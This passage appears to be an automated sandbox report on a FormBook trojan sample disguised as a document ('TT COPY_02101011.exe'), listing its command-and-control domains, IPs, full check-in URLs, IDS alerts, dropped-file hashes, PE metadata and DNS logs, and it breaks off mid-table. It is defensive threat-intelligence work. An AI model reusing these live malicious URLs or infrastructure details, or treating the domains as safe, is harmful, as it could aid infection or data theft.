| http://www.blttsperma.quest/e8ia/?iXg8nxg=pR2xmGsT/5nillNQjkLQ+n9+6iNIwMBz7svLGcpZWnNs4I/1r36jcwvV3IT8Xqaw6HRS&xTh4=5jvdevo8uz | 0% | Avira URL Cloud | safe |
| http://www.gadget198.xyz/e8ia/?iXg8nxg=yTyv9O3Jw5UvaSzklMNiw9yfcYAnwywQ+wyeDsCSdfwJ085LpTTX32oK1L+zNF/muuyB&xTh4=5jvdevo8uz | 0% | Avira URL Cloud | safe |
| http://www.yesrecompensas.lat/e8ia/?iXg8nxg=XTCOm0O2ezcXVHmIGYJnNvyPH+9cp28MuHIwWYLOKrNEhJt2q4EPucT34N3PnC3WtYmv&xTh4=5jvdevo8uz | 0% | Avira URL Cloud | safe |
| http://www.intelldat.com/e8ia/?iXg8nxg=OP/FDNHzL21SrAXHedPkfpmrZidd0Yb29DNAw19ZtZADeK9OL3CpiCl5COoBoa9aFzWI&xTh4=5jvdevo8uz | 0% | Avira URL Cloud | safe |
| http://www.webartsolution.net/e8ia/?iXg8nxg=PAc72DwZO0aWTT/MjmPIYr+XMy4z+KuKlzNTRujTlx9pyna9MI4XbiRkWDekRXBmxfjs&xTh4=5jvdevo8uz | 0% | Avira URL Cloud | safe |
| http://www.le-hameau-enchanteur.com/e8ia/?iXg8nxg=uzdrQi2cv+ipXcIIFlALJKSYThDDC/wlQTE6b69ZsR3gT5zSedzJyJgP4QFwrZDAKX1z&xTh4=5jvdevo8uz | 0% | Avira URL Cloud | safe |

          Domains and IPs

          Contacted Domains

| Name | IP | Active | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|---|
| www.le-hameau-enchanteur.com | 213.186.33.5 | true | true | | unknown |
| www.blttsperma.quest | 37.123.118.150 | true | true | | unknown |
| www.bestinvest-4-you.com | 104.21.31.204 | true | true | | unknown |
| helpfromjames.com | 185.65.236.168 | true | true | | unknown |
| webartsolution.net | 198.54.125.56 | true | true | | unknown |
| www.yesrecompensas.lat | 3.96.23.237 | true | true | | unknown |
| www.gadget198.xyz | 172.67.158.42 | true | true | | unknown |
| w2y6q8s9.stackpathcdn.com | 151.139.128.11 | true | true | | unknown |
| intelldat.com | 143.95.80.65 | true | true | | unknown |
| wss.easycompanies.com.au | 13.210.99.21 | true | false | | unknown |
| www.weprepareamerica-planet.com | 208.91.197.27 | true | false | | unknown |
| www.webartsolution.net | unknown | unknown | true | | unknown |
| www.mcclureic.xyz | unknown | unknown | true | | unknown |
| www.henleygirlscricket.com | unknown | unknown | true | | unknown |
| www.intelldat.com | unknown | unknown | true | | unknown |
| www.dandftrading.com | unknown | unknown | true | | unknown |
| www.helpfromjames.com | unknown | unknown | true | | unknown |

                                          Contacted URLs

| Name | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|
| www.helpfromjames.com/e8ia/ | true | Avira URL Cloud: safe | low |
| http://www.blttsperma.quest/e8ia/?iXg8nxg=pR2xmGsT/5nillNQjkLQ+n9+6iNIwMBz7svLGcpZWnNs4I/1r36jcwvV3IT8Xqaw6HRS&xTh4=5jvdevo8uz | true | Avira URL Cloud: safe | unknown |
| http://www.gadget198.xyz/e8ia/?iXg8nxg=yTyv9O3Jw5UvaSzklMNiw9yfcYAnwywQ+wyeDsCSdfwJ085LpTTX32oK1L+zNF/muuyB&xTh4=5jvdevo8uz | true | Avira URL Cloud: safe | unknown |
| http://www.yesrecompensas.lat/e8ia/?iXg8nxg=XTCOm0O2ezcXVHmIGYJnNvyPH+9cp28MuHIwWYLOKrNEhJt2q4EPucT34N3PnC3WtYmv&xTh4=5jvdevo8uz | true | Avira URL Cloud: safe | unknown |
| http://www.intelldat.com/e8ia/?iXg8nxg=OP/FDNHzL21SrAXHedPkfpmrZidd0Yb29DNAw19ZtZADeK9OL3CpiCl5COoBoa9aFzWI&xTh4=5jvdevo8uz | true | Avira URL Cloud: safe | unknown |
| http://www.webartsolution.net/e8ia/?iXg8nxg=PAc72DwZO0aWTT/MjmPIYr+XMy4z+KuKlzNTRujTlx9pyna9MI4XbiRkWDekRXBmxfjs&xTh4=5jvdevo8uz | true | Avira URL Cloud: safe | unknown |
| http://www.le-hameau-enchanteur.com/e8ia/?iXg8nxg=uzdrQi2cv+ipXcIIFlALJKSYThDDC/wlQTE6b69ZsR3gT5zSedzJyJgP4QFwrZDAKX1z&xTh4=5jvdevo8uz | true | Avira URL Cloud: safe | unknown |

                                          URLs from Memory and Binaries

| Name | Source | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|
| http://nsis.sf.net/NSIS_Error | TT COPY_02101011.exe | false | | high |
| http://nsis.sf.net/NSIS_ErrorError | TT COPY_02101011.exe | false | | high |

                                              Contacted IPs

                                              Public

| IP | Domain | Country | ASN | ASN Name | Malicious |
|---|---|---|---|---|---|
| 37.123.118.150 | www.blttsperma.quest | United Kingdom | 13213 | UK2NET-ASGB | true |
| 213.186.33.5 | www.le-hameau-enchanteur.com | France | 16276 | OVHFR | true |
| 185.65.236.168 | helpfromjames.com | United Kingdom | 33968 | INTERNETENGINEERINGASGB | true |
| 198.54.125.56 | webartsolution.net | United States | 22612 | NAMECHEAP-NETUS | true |
| 151.139.128.11 | w2y6q8s9.stackpathcdn.com | United States | 20446 | HIGHWINDS3US | true |
| 143.95.80.65 | intelldat.com | United States | 62729 | ASMALLORANGE1US | true |
| 3.96.23.237 | www.yesrecompensas.lat | United States | 16509 | AMAZON-02US | true |
| 172.67.158.42 | www.gadget198.xyz | United States | 13335 | CLOUDFLARENETUS | true |

                                              General Information

                                              Joe Sandbox Version:34.0.0 Boulder Opal
                                              Analysis ID:528714
                                              Start date:25.11.2021
                                              Start time:17:47:24
                                              Joe Sandbox Product:CloudBasic
                                              Overall analysis duration:0h 10m 26s
                                              Hypervisor based Inspection enabled:false
                                              Report type:full
                                              Sample file name:TT COPY_02101011.exe
                                              Cookbook file name:default.jbs
                                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                              Number of analysed new started processes analysed:22
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:1
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • HDC enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Detection:MAL
                                              Classification:mal100.troj.evad.winEXE@8/2@13/8
                                              EGA Information:Failed
                                              HDC Information:
                                              • Successful, ratio: 24.9% (good quality ratio 22.6%)
                                              • Quality average: 75.3%
                                              • Quality standard deviation: 31%
                                              HCA Information:
                                              • Successful, ratio: 89%
                                              • Number of executed functions: 84
                                              • Number of non-executed functions: 183
                                              Cookbook Comments:
                                              • Adjust boot time
                                              • Enable AMSI
                                              • Found application associated with file extension: .exe
                                              Warnings:
                                              • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, WerFault.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                                              • Excluded IPs from analysis (whitelisted): 92.122.145.220
                                              • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, store-images.s-microsoft.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                                              • Not all processes were analyzed, report is missing behavior information

                                              Simulations

                                              Behavior and APIs

                                              No simulations

                                              Joe Sandbox View / Context

                                              Domains

| Match | Associated Sample Name / URL | Detection | Context |
|---|---|---|---|
| www.blttsperma.quest | VSL_MV SEA-BLUE SHIP OWNERS.exe | malicious | 37.123.118.150 |
| | Original Shipment Doc Ref 2853801324189923,PDF.exe | malicious | 37.123.118.150 |
| www.bestinvest-4-you.com | POSGORSGL2110210416.exe | malicious | 104.21.31.204 |
| wss.easycompanies.com.au | VSL_MV SEA-BLUE SHIP OWNERS.exe | malicious | 13.210.99.21 |
| | NEW ORDER 3742.exe | malicious | 13.55.94.210 |
| | Swift001.exe | malicious | 13.55.94.210 |

                                              ASN

| Match | Associated Sample Name / URL | Detection | Context |
|---|---|---|---|
| UK2NET-ASGB | XKLyPH8fil.exe | malicious | 37.123.118.150 |
| | Citation-HEQ211025001T-EXPP v4,pdf.exe | malicious | 37.123.118.150 |
| | VSL_MV SEA-BLUE SHIP OWNERS.exe | malicious | 37.123.118.150 |
| | Order.exe | malicious | 37.123.118.150 |
| | New Offer.exe | malicious | 37.123.118.150 |
| | 202111161629639000582.exe | malicious | 37.123.118.150 |
| | vGULtWc6Jh.exe | malicious | 37.123.118.150 |
| | 2YnVgiNH23 | malicious | 83.170.125.27 |
| | 7OjVU04f8q.exe | malicious | 37.123.118.150 |
| | rfq.exe | malicious | 37.123.118.150 |
| | DHL50458006SHP.exe | malicious | 37.123.118.150 |
| | DuxgwH47QB.exe | malicious | 37.123.118.150 |
| | SWIFT-MLSB-11,546__doc.exe | malicious | 37.123.118.150 |
| | PRODUCT LIST.exe | malicious | 37.123.118.150 |
| | SWIFT DOCUMENT COPY.exe | malicious | 37.123.118.150 |
| | Payment Order.exe | malicious | 37.123.118.150 |
| | SOA & INV FOR OCT'21.exe | malicious | 37.123.118.150 |
| | Purchase Contract.xlsx | malicious | 37.123.118.150 |
| | Quotation No. 1687R.exe | malicious | 37.123.118.150 |
| | HCCuazHtYM.exe | malicious | 37.123.118.150 |

                                              JA3 Fingerprints

                                              No context

                                              Dropped Files

                                              No context

                                              Created / dropped Files

                                              C:\Users\user\AppData\Local\Temp\5itxry81kuzl8up3
                                              Process:C:\Users\user\Desktop\TT COPY_02101011.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):219451
                                              Entropy (8bit):7.993798564303036
                                              Encrypted:true
                                              SSDEEP:6144:XXWWWWWWWWWWWWWW9+HY+ryMDZ5cejsybkgbx+1Tzh+VWwCfQ5R:nWWWWWWWWWWWWWW9+DykZmeAk/9sNoWA
                                              MD5:7CFBCCD72474438D7FC638703213241C
                                              SHA1:45DA096B227587739BE2CFD1FD216A7A0FC40A9A
                                              SHA-256:02E9F10A4673CF06DC6DED72098E6D37E6162B5C88937EB67EBBFC0C0EE39D58
                                              SHA-512:66B38FD3C6A4A9C85338E13776204A65A4BE9323357C7758472946F2CC21ECE513D4DF4790CF232D109083365360046BE38732725F09B56D5FC0BF4B0CC0629B
                                              Malicious:false
                                              Reputation:low
                                              C:\Users\user\AppData\Local\Temp\nshA78C.tmp\wdtzbwxasut.dll
                                              Process:C:\Users\user\Desktop\TT COPY_02101011.exe
                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                              Category:dropped
                                              Size (bytes):119296
                                              Entropy (8bit):6.288224575764392
                                              Encrypted:false
                                              SSDEEP:1536:oEQbLaInqrSaynnz92zu5Q8cnsu0azuIC9ry1VAqKjMoZfSVgHJsWjcdOeJ:mnOSFpl4u9jqwQV02OeJ
                                              MD5:54C860C5CD0476D353802753C7BBFB06
                                              SHA1:F3FAC4C8E96CBB528944FE76C7F74FDA8171A597
                                              SHA-256:19FBFDB247A76A54351902926C309FD6D3E7BE25C6DCA0062FC781215680913E
                                              SHA-512:83DD85D9A54A1FA688C7776A15E48D70B8EC12ED789F4AC2054FA3AFFAED3FDAA375A5BD3D542C7B1831810A4825EE518A14F2390C50BFB65D9B774BCEB6B183
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              • Antivirus: ReversingLabs, Detection: 16%
                                              Reputation:low

                                              Static File Info

                                              General

                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                              Entropy (8bit):7.93374011532904
                                              TrID:
                                              • Win32 Executable (generic) a (10002005/4) 92.16%
                                              • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                              • DOS Executable Generic (2002/1) 0.02%
                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                              File name:TT COPY_02101011.exe
                                              File size:309491
                                              MD5:ebabc0d66a9e01cc0926f3b311feff5f
                                              SHA1:83a44664135a7255045becde754dae29be496c8f
                                              SHA256:ea8733d0ea6248e2f522487d09e7854230a648e67f1a5e90fea31f6305a1ff7b
                                              SHA512:b9f9c3ec7080bf31e0ab43b68f8183d75a59ae262e7320e846883f7ec91695e5e01d70432a163252712fc7bdb6e27b6e5fb6b5589e31eb8779f3b2b5586eeeeb
                                              SSDEEP:6144:rGidvqI+0kw8220eOw980S46r8T+1T5VM8vs+u/E4+jfQaVz6142k+QF:Zd+nzbOw9l6r8Ts5sysax6142xk

                                              File Icon

                                              Icon Hash:b2a88c96b2ca6a72

                                              Static PE Info

                                              General

                                              Entrypoint:0x4030e3
                                              Entrypoint Section:.text
                                              Digitally signed:false
                                              Imagebase:0x400000
                                              Subsystem:windows gui
                                              Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                              DLL Characteristics:
                                              Time Stamp:0x48EFCDCD [Fri Oct 10 21:49:01 2008 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:
                                              OS Version Major:4
                                              OS Version Minor:0
                                              File Version Major:4
                                              File Version Minor:0
                                              Subsystem Version Major:4
                                              Subsystem Version Minor:0
                                              Import Hash:7fa974366048f9c551ef45714595665e

                                              Entrypoint Preview

                                              Instruction
                                              sub esp, 00000180h
                                              push ebx
                                              push ebp
                                              push esi
                                              xor ebx, ebx
                                              push edi
                                              mov dword ptr [esp+18h], ebx
                                              mov dword ptr [esp+10h], 00409158h
                                              xor esi, esi
                                              mov byte ptr [esp+14h], 00000020h
                                              call dword ptr [00407030h]
                                              push 00008001h
                                              call dword ptr [004070B0h]
                                              push ebx
                                              call dword ptr [0040727Ch]
                                              push 00000008h
                                              mov dword ptr [0042EC18h], eax
                                              call 00007F80707D36A8h
                                              mov dword ptr [0042EB64h], eax
                                              push ebx
                                              lea eax, dword ptr [esp+34h]
                                              push 00000160h
                                              push eax
                                              push ebx
                                              push 00428F90h
                                              call dword ptr [00407158h]
                                              push 0040914Ch
                                              push 0042E360h
                                              call 00007F80707D335Fh
                                              call dword ptr [004070ACh]
                                              mov edi, 00434000h
                                              push eax
                                              push edi
                                              call 00007F80707D334Dh
                                              push ebx
                                              call dword ptr [0040710Ch]
                                              cmp byte ptr [00434000h], 00000022h
                                              mov dword ptr [0042EB60h], eax
                                              mov eax, edi
                                              jne 00007F80707D0B8Ch
                                              mov byte ptr [esp+14h], 00000022h
                                              mov eax, 00434001h
                                              push dword ptr [esp+14h]
                                              push eax
                                              call 00007F80707D2E40h
                                              push eax
                                              call dword ptr [0040721Ch]
                                              mov dword ptr [esp+1Ch], eax
                                              jmp 00007F80707D0BE5h
                                              cmp cl, 00000020h
                                              jne 00007F80707D0B88h
                                              inc eax
                                              cmp byte ptr [eax], 00000020h
                                              je 00007F80707D0B7Ch
                                              cmp byte ptr [eax], 00000022h
                                              mov byte ptr [eax+eax+00h], 00000000h

                                              Rich Headers

                                              Programming Language:
                                              • [EXP] VC++ 6.0 SP5 build 8804

                                              Data Directories

                                              Name | Virtual Address | Virtual Size | Is in Section
                                              IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_IMPORT | 0x74b0 | 0xb4 | .rdata
                                              IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x37000 | 0x900 | .rsrc
                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_IAT | 0x7000 | 0x28c | .rdata
                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                              Sections

                                              Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                              .text | 0x1000 | 0x5b68 | 0x5c00 | False | 0.67722486413 | data | 6.48746502716 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                              .rdata | 0x7000 | 0x129c | 0x1400 | False | 0.4337890625 | data | 5.04904254867 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .data | 0x9000 | 0x25c58 | 0x400 | False | 0.58203125 | data | 4.76995537906 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                              .ndata | 0x2f000 | 0x8000 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .rsrc | 0x37000 | 0x900 | 0xa00 | False | 0.4078125 | data | 3.93441125971 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                              Resources

                                              Name | RVA | Size | Type | Language | Country
                                              RT_ICON | 0x37190 | 0x2e8 | data | English | United States
                                              RT_DIALOG | 0x37478 | 0x100 | data | English | United States
                                              RT_DIALOG | 0x37578 | 0x11c | data | English | United States
                                              RT_DIALOG | 0x37698 | 0x60 | data | English | United States
                                              RT_GROUP_ICON | 0x376f8 | 0x14 | data | English | United States
                                              RT_MANIFEST | 0x37710 | 0x1eb | XML 1.0 document, ASCII text, with very long lines, with no line terminators | English | United States

                                              Imports

                                              DLL | Import
                                              KERNEL32.dll | CompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetTickCount, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, GetWindowsDirectoryA, SetFileTime, GetCommandLineA, SetErrorMode, LoadLibraryA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, GetVersion, CloseHandle, lstrcmpiA, lstrcmpA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GetModuleHandleA, LoadLibraryExA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, GetTempPathA
                                              USER32.dll | EndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, DestroyWindow, CreateDialogParamA, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, OpenClipboard, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
                                              GDI32.dll | SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
                                              SHELL32.dll | SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
                                              ADVAPI32.dll | RegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
                                              COMCTL32.dll | ImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                              ole32.dll | CoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                                              VERSION.dll | GetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

                                              Possible Origin

                                              Language of compilation system | Country where language is spoken | Map
                                              English | United States |

                                              Network Behavior

                                              Snort IDS Alerts

                                              Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                              11/25/21-17:50:07.050486 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49820 | 37.123.118.150 | 192.168.2.4
                                              11/25/21-17:50:17.640515 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49824 | 80 | 192.168.2.4 | 143.95.80.65
                                              11/25/21-17:50:17.640515 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49824 | 80 | 192.168.2.4 | 143.95.80.65
                                              11/25/21-17:50:17.640515 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49824 | 80 | 192.168.2.4 | 143.95.80.65
                                              11/25/21-17:50:56.215134 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49850 | 80 | 192.168.2.4 | 104.21.31.204
                                              11/25/21-17:50:56.215134 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49850 | 80 | 192.168.2.4 | 104.21.31.204
                                              11/25/21-17:50:56.215134 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49850 | 80 | 192.168.2.4 | 104.21.31.204

                                              TCP Packets


                                              UDP Packets


                                              DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Nov 25, 2021 17:49:30.427966118 CET | 192.168.2.4 | 8.8.8.8 | 0x6f8e | Standard query (0) | www.mcclureic.xyz | A (IP address) | IN (0x0001)
Nov 25, 2021 17:49:40.561280966 CET | 192.168.2.4 | 8.8.8.8 | 0xe637 | Standard query (0) | www.yesrecompensas.lat | A (IP address) | IN (0x0001)
Nov 25, 2021 17:49:45.893459082 CET | 192.168.2.4 | 8.8.8.8 | 0x968a | Standard query (0) | www.gadget198.xyz | A (IP address) | IN (0x0001)
Nov 25, 2021 17:49:50.999294996 CET | 192.168.2.4 | 8.8.8.8 | 0x550f | Standard query (0) | www.le-hameau-enchanteur.com | A (IP address) | IN (0x0001)
Nov 25, 2021 17:49:56.159490108 CET | 192.168.2.4 | 8.8.8.8 | 0x12e7 | Standard query (0) | www.henleygirlscricket.com | A (IP address) | IN (0x0001)
Nov 25, 2021 17:50:01.505476952 CET | 192.168.2.4 | 8.8.8.8 | 0x8c70 | Standard query (0) | www.webartsolution.net | A (IP address) | IN (0x0001)
Nov 25, 2021 17:50:06.924803972 CET | 192.168.2.4 | 8.8.8.8 | 0xe4c9 | Standard query (0) | www.blttsperma.quest | A (IP address) | IN (0x0001)
Nov 25, 2021 17:50:17.329592943 CET | 192.168.2.4 | 8.8.8.8 | 0x8757 | Standard query (0) | www.intelldat.com | A (IP address) | IN (0x0001)
Nov 25, 2021 17:50:22.799395084 CET | 192.168.2.4 | 8.8.8.8 | 0x8462 | Standard query (0) | www.helpfromjames.com | A (IP address) | IN (0x0001)
Nov 25, 2021 17:50:44.591826916 CET | 192.168.2.4 | 8.8.8.8 | 0xff5e | Standard query (0) | www.helpfromjames.com | A (IP address) | IN (0x0001)
Nov 25, 2021 17:50:48.923758030 CET | 192.168.2.4 | 8.8.8.8 | 0xa78c | Standard query (0) | www.dandftrading.com | A (IP address) | IN (0x0001)
Nov 25, 2021 17:50:56.143178940 CET | 192.168.2.4 | 8.8.8.8 | 0xb4d0 | Standard query (0) | www.bestinvest-4-you.com | A (IP address) | IN (0x0001)
Nov 25, 2021 17:51:01.299563885 CET | 192.168.2.4 | 8.8.8.8 | 0x51f4 | Standard query (0) | www.weprepareamerica-planet.com | A (IP address) | IN (0x0001)

                                              DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Nov 25, 2021 17:49:30.530443907 CET | 8.8.8.8 | 192.168.2.4 | 0x6f8e | Server failure (2) | www.mcclureic.xyz | none | none | A (IP address) | IN (0x0001)
Nov 25, 2021 17:49:40.645955086 CET | 8.8.8.8 | 192.168.2.4 | 0xe637 | No error (0) | www.yesrecompensas.lat | | 3.96.23.237 | A (IP address) | IN (0x0001)
Nov 25, 2021 17:49:45.931274891 CET | 8.8.8.8 | 192.168.2.4 | 0x968a | No error (0) | www.gadget198.xyz | | 172.67.158.42 | A (IP address) | IN (0x0001)
Nov 25, 2021 17:49:45.931274891 CET | 8.8.8.8 | 192.168.2.4 | 0x968a | No error (0) | www.gadget198.xyz | | 104.21.8.250 | A (IP address) | IN (0x0001)
Nov 25, 2021 17:49:51.086345911 CET | 8.8.8.8 | 192.168.2.4 | 0x550f | No error (0) | www.le-hameau-enchanteur.com | | 213.186.33.5 | A (IP address) | IN (0x0001)
Nov 25, 2021 17:49:56.369827032 CET | 8.8.8.8 | 192.168.2.4 | 0x12e7 | No error (0) | www.henleygirlscricket.com | w2y6q8s9.stackpathcdn.com | | CNAME (Canonical name) | IN (0x0001)
Nov 25, 2021 17:49:56.369827032 CET | 8.8.8.8 | 192.168.2.4 | 0x12e7 | No error (0) | w2y6q8s9.stackpathcdn.com | | 151.139.128.11 | A (IP address) | IN (0x0001)
Nov 25, 2021 17:50:01.580594063 CET | 8.8.8.8 | 192.168.2.4 | 0x8c70 | No error (0) | www.webartsolution.net | webartsolution.net | | CNAME (Canonical name) | IN (0x0001)
Nov 25, 2021 17:50:01.580594063 CET | 8.8.8.8 | 192.168.2.4 | 0x8c70 | No error (0) | webartsolution.net | | 198.54.125.56 | A (IP address) | IN (0x0001)
Nov 25, 2021 17:50:06.989542961 CET | 8.8.8.8 | 192.168.2.4 | 0xe4c9 | No error (0) | www.blttsperma.quest | | 37.123.118.150 | A (IP address) | IN (0x0001)
Nov 25, 2021 17:50:17.490470886 CET | 8.8.8.8 | 192.168.2.4 | 0x8757 | No error (0) | www.intelldat.com | intelldat.com | | CNAME (Canonical name) | IN (0x0001)
Nov 25, 2021 17:50:17.490470886 CET | 8.8.8.8 | 192.168.2.4 | 0x8757 | No error (0) | intelldat.com | | 143.95.80.65 | A (IP address) | IN (0x0001)
Nov 25, 2021 17:50:22.867161989 CET | 8.8.8.8 | 192.168.2.4 | 0x8462 | No error (0) | www.helpfromjames.com | helpfromjames.com | | CNAME (Canonical name) | IN (0x0001)
Nov 25, 2021 17:50:22.867161989 CET | 8.8.8.8 | 192.168.2.4 | 0x8462 | No error (0) | helpfromjames.com | | 185.65.236.168 | A (IP address) | IN (0x0001)
Nov 25, 2021 17:50:44.630163908 CET | 8.8.8.8 | 192.168.2.4 | 0xff5e | No error (0) | www.helpfromjames.com | helpfromjames.com | | CNAME (Canonical name) | IN (0x0001)
Nov 25, 2021 17:50:44.630163908 CET | 8.8.8.8 | 192.168.2.4 | 0xff5e | No error (0) | helpfromjames.com | | 185.65.236.168 | A (IP address) | IN (0x0001)
Nov 25, 2021 17:50:49.302557945 CET | 8.8.8.8 | 192.168.2.4 | 0xa78c | No error (0) | www.dandftrading.com | wss.easycompanies.com.au | | CNAME (Canonical name) | IN (0x0001)
Nov 25, 2021 17:50:49.302557945 CET | 8.8.8.8 | 192.168.2.4 | 0xa78c | No error (0) | wss.easycompanies.com.au | | 13.210.99.21 | A (IP address) | IN (0x0001)
Nov 25, 2021 17:50:56.192150116 CET | 8.8.8.8 | 192.168.2.4 | 0xb4d0 | No error (0) | www.bestinvest-4-you.com | | 104.21.31.204 | A (IP address) | IN (0x0001)
Nov 25, 2021 17:50:56.192150116 CET | 8.8.8.8 | 192.168.2.4 | 0xb4d0 | No error (0) | www.bestinvest-4-you.com | | 172.67.179.242 | A (IP address) | IN (0x0001)
Nov 25, 2021 17:51:01.443115950 CET | 8.8.8.8 | 192.168.2.4 | 0x51f4 | No error (0) | www.weprepareamerica-planet.com | | 208.91.197.27 | A (IP address) | IN (0x0001)

                                              HTTP Request Dependency Graph

                                              • www.yesrecompensas.lat
                                              • www.gadget198.xyz
                                              • www.le-hameau-enchanteur.com
                                              • www.henleygirlscricket.com
                                              • www.webartsolution.net
                                              • www.blttsperma.quest
                                              • www.intelldat.com

                                              HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.4 | 49781 | 3.96.23.237 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
